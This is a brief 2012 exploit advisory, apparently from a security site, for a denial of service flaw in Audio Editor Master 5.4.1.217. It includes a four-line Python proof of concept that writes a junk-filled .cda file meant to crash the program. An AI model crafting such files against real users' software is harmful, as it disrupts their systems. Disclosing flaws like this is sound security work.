Audio Editor Master Denial Of Service Exploit

Summary

Audio Editor Master 5.4.1.217 is prone to a denial of service vulnerability

Credit:

The information has been provided by Onying.


Details

Vulnerable Systems:
 * Audio Editor Master 5.4.1.217

junk =’x41’*100
textfile = open(‘onyiing.cda’ , ‘w’)
textfile.write(junk)
textfile.close()

Disclosure Timeline:
Published: 2012-06-06

Categories: Exploits